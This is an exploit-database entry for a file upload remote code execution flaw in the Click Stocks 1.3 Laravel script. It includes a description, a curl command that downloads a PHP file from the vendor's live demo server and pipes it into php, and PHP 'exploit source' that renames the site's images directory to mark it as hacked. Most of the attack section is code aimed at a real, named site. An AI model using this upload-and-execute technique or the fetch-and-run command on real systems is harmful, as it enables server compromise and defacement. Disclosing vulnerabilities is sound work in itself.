Lucene search

K
zdtNu11secur1ty1337DAY-ID-39151
HistoryNov 19, 2023 - 12:00 a.m.

Click Stocks 1.3 - File Upload Remote Code Execution Vulnerability

2023-11-1900:00:00
nu11secur1ty
0day.today
248
file upload
remote code execution
rce attacks
web vulnerability
exploit execution
vulnerability
unsanitized parameter
exploit source
proof and exploit

AI Score

7.5

Confidence

Low

## Title: Click Stocks-1.3 - File Upload - RCE
## Author: nu11secur1ty
## Vendor: https://codecanyon.net/user/media-city
## Software: https://codecanyon.net/item/click-stocks-free-stock-photos-laravel-script/23356416
## Reference: https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The class parameter btn-btn-danger-js-labelFile is vulnerable to File Upload and RCE attacks, it is not sanitized correctly.
The attacker can upload a virus directly on the server by using this web vulnerability, and then he can execute it, this can be 
the end of this server depending on the scenario! In this case, I just renamed the directory images =) 
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: HIGH-CRITICAL Vulnerability

[+]Exploit execution:

```curl
 curl -s https://mediacity.co.in/clickstocks/public/images/rapist.php | php
```

[+]Exploit source:
```PHP
<?php 
// rapist by nu11secur1ty - 2023
// Old Name Of The file
	$old_name = "/public/images" ; 
  
// New Name For The File
	$new_name = "/public/imagesHACKED/" ; 
  
// using rename() function to rename the file
	rename( $old_name, $new_name) ;
  
?>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/media-city/Click-Stocks-1.3)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/11/click-stocks-13-file-upload-rce.html)

## Time spend:
00:35:00

AI Score

7.5

Confidence

Low